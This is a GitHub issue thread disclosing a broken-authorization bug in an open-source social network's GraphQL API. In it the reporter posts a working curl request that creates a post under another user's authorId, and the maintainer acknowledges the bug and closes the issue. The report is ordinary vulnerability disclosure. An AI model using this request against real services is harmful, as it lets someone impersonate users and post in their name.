Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Security problem #65

Closed
fabiooshiro opened this issue Aug 22, 2020 · 7 comments
Closed

Security problem #65

fabiooshiro opened this issue Aug 22, 2020 · 7 comments
Labels
type: bug Something isn't working

Comments

@fabiooshiro
Copy link

Hi guys, nice work!

I found a problem that allows me to post with name of other people...

How the security layer works in resolvers?
@fabiooshiro fabiooshiro added the type: bug Something isn't working label Aug 22, 2020
@DimiMikadze
Copy link
Owner

Hi @fabiooshiro, thanks for opening the issue. However, please respect the issue template, so the bug you are encountering is easily understandable and replicable for other people.

You need to elaborate more on describing the bug and explaining steps to reproduce.

@fabiooshiro
Copy link
Author

step 1, find the user id
image

step 2, replace the access token and the id

curl 'https://csn-api.herokuapp.com/graphql' \
  -H 'Connection: keep-alive' \
  -H 'accept: */*' \
  -H 'authorization: <YOUR-ACCESS-TOKEN>' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36' \
  -H 'content-type: application/json' \
  -H 'Origin: https://worldexplorer.netlify.app' \
  -H 'Sec-Fetch-Site: cross-site' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Referer: https://worldexplorer.netlify.app/' \
  -H 'Accept-Language: en-US,en;q=0.9,pt;q=0.8' \
  --data-binary $'{"operationName":null,"variables":{"input":{"title":"Some post","image":"","authorId":"<THE-USER-ID>"}},"query":"mutation ($input: CreatePostInput\u0021) {\\n  createPost(input: $input) {\\n    id\\n    __typename\\n  }\\n}\\n"}' \
  --compressed

@fabiooshiro
Copy link
Author

the result
image

@DimiMikadze DimiMikadze mentioned this issue Sep 7, 2020
Closed
7 tasks
@fabiooshiro
Copy link
Author

If you dig more you will see that all system parts suffer from the same problem...
Good news is that's not difficult do solve

@fabiooshiro
Copy link
Author

take your time

@DimiMikadze
Copy link
Owner

@fabiooshiro Once again, thank you for reporting the bug.

Currently, I'm busy with other projects, and I'm planning to address this issue soon when I'm available.

At first, we need to investigate what parts of the application contain the bug. Then create an issue with a detailed description of the bugs, explanation of how to reproduce them, and plan how to fix them.

Finally, we can start working on a PR based on a plan.

If you want to take part in this process, your work will be much appreciated, but please keep the "plan" and "issue/PR" templates in mind.

@TomKochievi TomKochievi mentioned this issue Sep 16, 2020
Closed
@DimiMikadze
Copy link
Owner

DimiMikadze commented Oct 5, 2020
edited

Closing in favor of #73

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
type: bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@fabiooshiro @DimiMikadze